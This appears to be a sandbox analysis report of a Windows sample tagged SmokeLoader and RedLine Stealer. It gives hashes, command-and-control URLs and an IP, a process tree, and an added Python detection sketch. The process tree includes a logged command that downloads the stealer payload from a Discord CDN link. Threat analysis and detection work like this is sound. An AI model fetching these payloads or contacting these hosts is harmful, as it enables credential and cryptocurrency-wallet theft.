Analysis
- max time kernel: 153s
- max time network: 156s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 23-08-2021 13:56

Static task: static1
Behavioral task: behavioral1
- Sample: 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
- Resource: win10v20210408
General
- Target: 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
- Size: 276KB
- MD5: 324f47a307e160a75080e4d7f8175fb7
- SHA1: 7a14bb0ff3cfdd94316f3e650ba7f3b73fdd6b0d
- SHA256: 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f
- SHA512: b86312b91c0804e62e9cbf332eff0d8a5719ae9a723f4dc545237a43b00cad888867fba246fa03e5388a5f67f280f50265e9e24df8ffb67fa66076e599db1e99
Malware Config
Extracted
- Family: smokeloader
- Version: 2020
- C2:
  - http://aucmoney.com/upload/
  - http://thegymmum.com/upload/
  - http://atvcampingtrips.com/upload/
  - http://kuapakualaman.com/upload/
  - http://renatazarazua.com/upload/
  - http://nasufmutlu.com/upload/
Extracted
- Family: redline
- Botnet: @soul3ss
- C2: 188.130.139.12:30376
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (2 IoCs)
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exe | family_redline
  C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exe | family_redline
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Downloads MZ/PE file
- Executes dropped EXE (6 IoCs)
  pid | process
  1904 | AC85.exe
  1160 | extd.exe
  832 | extd.exe
  992 | extd.exe
  1616 | soul3ss.exe
  1600 | extd.exe
- (signature title not present on the page; yara rule: upx) (13 IoCs)
  resource | yara_rule
  \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe | upx (8 entries)
  C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe | upx (5 entries)
- Deletes itself (1 IoC)
  pid | process
  1200 | (not named in the report)
- Loads dropped DLL (11 IoCs)
  pid | process
  1200 | (not named in the report) (2 entries)
  288 | (not named in the report)
  968 | cmd.exe (8 entries)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid | process
  1616 | soul3ss.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | process
  1848 | 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe (2 entries)
  1200 | (not named in the report) (remaining 62 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | process
  1200 | (not named in the report)
- Suspicious behavior: MapViewOfSection (1 IoC)
  pid | process
  1848 | 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description | pid | process
  Token: SeShutdownPrivilege | 1200 | (not named in the report) (5 entries)
  Token: SeDebugPrivilege | 1616 | soul3ss.exe
- Suspicious use of FindShellTrayWindow (4 IoCs)
  pid | process
  1200 | (not named in the report) (4 entries)
- Suspicious use of SendNotifyMessage (4 IoCs)
  pid | process
  1200 | (not named in the report) (4 entries)
- Suspicious use of WriteProcessMemory (22 IoCs)
  description | pid | process | target pid | target process
  PID 1200 wrote to memory of 1904 | 1200 | (not named) | 1904 | AC85.exe (3 entries)
  PID 1904 wrote to memory of 968 | 1904 | AC85.exe | 968 | cmd.exe (3 entries)
  PID 968 wrote to memory of 1160 | 968 | cmd.exe | 1160 | extd.exe (3 entries)
  PID 968 wrote to memory of 832 | 968 | cmd.exe | 832 | extd.exe (3 entries)
  PID 968 wrote to memory of 992 | 968 | cmd.exe | 992 | extd.exe (3 entries)
  PID 968 wrote to memory of 1616 | 968 | cmd.exe | 1616 | soul3ss.exe (4 entries)
  PID 968 wrote to memory of 1600 | 968 | cmd.exe | 1600 | extd.exe (3 entries)

Note on PID 1200: the report never names this process and it is absent from the process tree, yet it is the process that deletes the original sample, starts AC85.exe (first WriteProcessMemory rows), holds SeShutdownPrivilege and generates the GetForegroundWindow/FindShellTrayWindow/SendNotifyMessage spam. Together with the sample's MapViewOfSection activity (PID 1848) this is consistent with a pre-existing process that the sample injected into; its image name cannot be recovered from this page, so treat 1200 as the injected host when reading the chain below.
Processes
(nesting follows the report's 1/2/3 depth markers; the two depth-1 entries have no parent in the tree, and the WriteProcessMemory signature shows AC85.exe was started by the unnamed PID 1200)

[1] C:\Users\Admin\AppData\Local\Temp\4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe (PID 1848)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\AC85.exe (PID 1904)
    cmdline: C:\Users\Admin\AppData\Local\Temp\AC85.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe (PID 968)
        cmdline: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\AD51.bat C:\Users\Admin\AppData\Local\Temp\AC85.exe"
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe (PID 1160)
            cmdline: C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
            - Executes dropped EXE

        [3] C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe (PID 832)
            cmdline: C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
            - Executes dropped EXE

        [3] C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe (PID 992)
            cmdline: C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""
            - Executes dropped EXE

        [3] C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exe (PID 1616)
            cmdline: soul3ss.exe
            - Executes dropped EXE
            - Suspicious behavior: CmdExeWriteProcessMemorySpam
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe (PID 1600)
            cmdline: C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
            - Executes dropped EXE

Reading the chain: AC85.exe unpacks a batch script (AD51.bat) and a UPX-packed helper (extd.exe) into a nested %TEMP%\*.tmp\*.tmp directory, then runs the script through cmd.exe with its own path as an argument. The script drives extd.exe through four switches: "/hideself", "/random" with a numeric argument, "/download" of soul3ss.exe from the Discord CDN, and "/sleep" with a numeric argument. The downloaded file is executed from %TEMP%\8751\ and is the process the RedLine Payload yara rule matched.
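The following is an added detection sketch and is not part of the sandbox report or of any vendor tooling. It encodes the process chain and the dropped-file hashes from this page as rules, runs them over process-creation events constructed from the tree above (the field names pid, ppid, image and cmdline are assumed to mirror a Sysmon event ID 1 export; the parent PID 1200 for AC85.exe is taken from the WriteProcessMemory signature, and the sample's own parent is unknown so 0 is used), and reports the cmd.exe that both downloaded a payload via the helper and then launched it.

```python
"""Detection sketch for the AC85.exe -> cmd.exe -> extd.exe -> soul3ss.exe chain (added example)."""
import re
from dataclasses import dataclass

# IoCs copied from the report: dropped-file SHA256 values and the extracted C2 hosts.
DROPPED_SHA256 = {
    "6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009": "soul3ss.exe (RedLine payload)",
    "65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd": "AC85.exe",
    "a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e": "extd.exe (UPX-packed helper)",
    "74f0a9fa397ec48e6d8425a758187980df03d67fe64684a3470ef4436e1eec61": "AD51.bat",
}
KNOWN_C2 = {
    "aucmoney.com", "thegymmum.com", "atvcampingtrips.com",      # SmokeLoader
    "kuapakualaman.com", "renatazarazua.com", "nasufmutlu.com",  # SmokeLoader
    "188.130.139.12",                                            # RedLine
}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record; field names are an assumption, not a vendor schema."""
    pid: int
    ppid: int
    image: str     # full path of the started executable
    cmdline: str   # command line as logged


# Patterns for the behaviours visible in the process tree.
TEMP_TMP_BAT = re.compile(r'\\AppData\\Local\\Temp\\[^\\\s"]+\.tmp\\.*?\.bat\b', re.I)
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\.*?\.exe$", re.I)
CDN_EXE_URL = re.compile(r"https://cdn\.discordapp\.com/attachments/\S+?\.exe", re.I)
HELPER_SWITCH = re.compile(r'"/(hideself|random|sleep|download)"', re.I)


def _base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def find_chain(events):
    """Map pid -> list of rule names that fired for that process."""
    by_pid = {e.pid: e for e in events}
    hits = {}

    def hit(pid, rule):
        hits.setdefault(pid, []).append(rule)

    for e in events:
        parent = by_pid.get(e.ppid)
        if _base(e.image) == "cmd.exe" and "/c" in e.cmdline.lower() and TEMP_TMP_BAT.search(e.cmdline):
            hit(e.pid, "cmd_runs_bat_from_temp_tmp")      # cmd /c "...\AD4F.tmp\AD50.tmp\AD51.bat ..."
        if TEMP_EXE.search(e.image):
            if parent is None:
                hit(e.pid, "temp_exe_parent_not_in_log")   # AC85.exe started by the unnamed PID 1200
            elif _base(parent.image) == "cmd.exe":
                hit(e.pid, "temp_exe_spawned_by_cmd")
                m = HELPER_SWITCH.search(e.cmdline)
                if m:
                    hit(e.pid, "helper_switch_" + m.group(1).lower())
                if CDN_EXE_URL.search(e.cmdline):
                    hit(e.pid, "downloads_exe_from_discord_cdn")
    return hits


def summarize(events):
    """Return [(cmd_pid, [payload names])]: one cmd.exe ran a %TEMP% .bat, a child fetched an .exe
    from the Discord CDN, and another child is a %TEMP% executable with no helper switch, i.e.
    the downloaded payload itself (soul3ss.exe in this report)."""
    hits = find_chain(events)
    verdicts = []
    for pid, rules in hits.items():
        if "cmd_runs_bat_from_temp_tmp" not in rules:
            continue
        kids = [c for c in events if c.ppid == pid]
        downloaded = any("downloads_exe_from_discord_cdn" in hits.get(c.pid, []) for c in kids)
        payloads = [_base(c.image) for c in kids
                    if "temp_exe_spawned_by_cmd" in hits.get(c.pid, [])
                    and not any(r.startswith("helper_switch_") for r in hits[c.pid])]
        if downloaded and payloads:
            verdicts.append((pid, payloads))
    return verdicts


def match_dropped(observed):
    """observed: {path: sha256}. Return [(path, label)] for hashes in the report's Downloads list."""
    return [(p, DROPPED_SHA256[h.lower()]) for p, h in observed.items() if h.lower() in DROPPED_SHA256]


def is_known_c2(host: str) -> bool:
    return host.lower().rstrip(".") in KNOWN_C2


# Constructed events mirroring the process tree above (not captured telemetry).
T = r"C:\Users\Admin\AppData\Local\Temp"
E = T + r"\AD4F.tmp\AD50.tmp\extd.exe"
SAMPLE = T + r"\4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe"
SAMPLE_EVENTS = [
    ProcEvent(1848, 0, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(1904, 1200, T + r"\AC85.exe", T + r"\AC85.exe"),
    ProcEvent(968, 1904, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd" /c "' + T + r"\AD4F.tmp\AD50.tmp\AD51.bat " + T + r'\AC85.exe"'),
    ProcEvent(1160, 968, E, E + ' "/hideself" "" "" "" "" "" "" "" ""'),
    ProcEvent(832, 968, E, E + ' "/random" "9000000" "" "" "" "" "" "" ""'),
    ProcEvent(992, 968, E, E + ' "/download" "https://cdn.discordapp.com/attachments/'
              '879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""'),
    ProcEvent(1616, 968, T + r"\8751\soul3ss.exe", "soul3ss.exe"),
    ProcEvent(1600, 968, E, E + ' "/sleep" "9000009" "" "" "" "" "" "" ""'),
]

if __name__ == "__main__":
    for pid, rules in sorted(find_chain(SAMPLE_EVENTS).items()):
        print(pid, rules)
    print("verdict:", summarize(SAMPLE_EVENTS))
```

The rules deliberately key on structure rather than on the file names AC85.exe or extd.exe, which are per-run: a cmd.exe launched with a .bat under a nested %TEMP%\*.tmp directory, a child under %TEMP% whose command line carries a Discord CDN .exe URL, and a sibling %TEMP% executable launched without any of the helper switches. The hash match is the weakest signal here since the dropped files are regenerated per build; it is included because the report gives the values.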
Network
MITRE ATT&CK Enterprise v6
Downloads
(dropped files; the report repeats an entry for each drop event of the same file, collapsed here to one entry per path with the repeat count)

- C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exe (2 entries)
  MD5: 411ca7ba89ae45e92f9ed4663f903335
  SHA1: 6360b07844800b8e6e6e2b11ee3c8d051c4a2e96
  SHA256: 6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009
  SHA512: bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

- C:\Users\Admin\AppData\Local\Temp\AC85.exe (1 entry)
  MD5: e16f915796d4762014fc3864d4444ac3
  SHA1: 819364784cf0d3fe440b6c9a3950de7fa093e805
  SHA256: 65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
  SHA512: 1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

- C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\AD51.bat (1 entry)
  MD5: 3c688a168d11fe43e0ef29ac74beab5f
  SHA1: 1a394048e88b72fbbae98bad3a327f3bf31dfa00
  SHA256: 74f0a9fa397ec48e6d8425a758187980df03d67fe64684a3470ef4436e1eec61
  SHA512: 2037c8f3120469b6fa89392df63ac233bb5129a4486f182c67643f64593a1f9a0504ff25aeaacd6c043015d720c115a4b2cc1aa08d3d421a10a89996deb0ad6c

- C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe (5 entries)
  MD5: b019efc4814c7a73b1413a335be1fa13
  SHA1: 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
  SHA256: a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
  SHA512: d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

- \Users\Admin\AppData\Local\Temp\AC85.exe (3 entries; same hashes as the C:\ entry above)
  MD5: e16f915796d4762014fc3864d4444ac3
  SHA1: 819364784cf0d3fe440b6c9a3950de7fa093e805
  SHA256: 65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
  SHA512: 1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

- \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe (8 entries; same hashes as the C:\ entry above)
  MD5: b019efc4814c7a73b1413a335be1fa13
  SHA1: 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
  SHA256: a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
  SHA512: d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

- memory/832-80-0x0000000000000000-mapping.dmp
- memory/968-70-0x0000000000000000-mapping.dmp
- memory/992-85-0x0000000000000000-mapping.dmp
- memory/1160-75-0x0000000000000000-mapping.dmp
- memory/1200-63-0x0000000002AF0000-0x0000000002B06000-memory.dmp (Filesize 88KB)
- memory/1600-93-0x0000000000000000-mapping.dmp
- memory/1616-89-0x0000000000000000-mapping.dmp
- memory/1616-96-0x0000000000F20000-0x0000000000F21000-memory.dmp (Filesize 4KB)
- memory/1616-98-0x0000000000CA0000-0x0000000000CA1000-memory.dmp (Filesize 4KB)
- memory/1848-61-0x0000000000020000-0x0000000000029000-memory.dmp (Filesize 36KB)
- memory/1848-60-0x00000000757C1000-0x00000000757C3000-memory.dmp (Filesize 8KB)
- memory/1848-62-0x0000000000400000-0x00000000023AF000-memory.dmp (Filesize 31.7MB)
- memory/1904-66-0x0000000000000000-mapping.dmp
- memory/1904-69-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp (Filesize 8KB)